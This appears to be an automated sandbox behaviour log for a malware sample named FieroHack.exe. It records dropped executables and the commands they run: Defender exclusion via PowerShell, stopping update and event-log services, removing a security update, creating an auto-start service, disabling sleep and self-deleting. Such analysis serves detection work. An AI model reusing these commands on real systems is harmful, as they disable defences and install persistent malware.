      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Users\user\Desktop\FieroHack.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: FieroHack.exeReversingLabs: Detection: 48%
      Source: FieroHack.exeVirustotal: Detection: 46%
      Source: C:\Users\user\Desktop\FieroHack.exeFile read: C:\Users\user\Desktop\FieroHack.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\FieroHack.exe "C:\Users\user\Desktop\FieroHack.exe"
      Source: C:\Users\user\Desktop\FieroHack.exeProcess created: C:\Users\user\AppData\Roaming\WeMod.exe C:\Users\user\AppData\Roaming\WeMod.exe
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\FieroHack.exeProcess created: C:\Users\user\AppData\Roaming\Sirus.exe C:\Users\user\AppData\Roaming\Sirus.exe
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "BFFESVJT"
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "BFFESVJT"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\explorer.exe explorer.exe
      Source: C:\Users\user\Desktop\FieroHack.exeProcess created: C:\Users\user\AppData\Roaming\WeMod.exe C:\Users\user\AppData\Roaming\WeMod.exeJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeProcess created: C:\Users\user\AppData\Roaming\Sirus.exe C:\Users\user\AppData\Roaming\Sirus.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "BFFESVJT"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "BFFESVJT"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\explorer.exe explorer.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
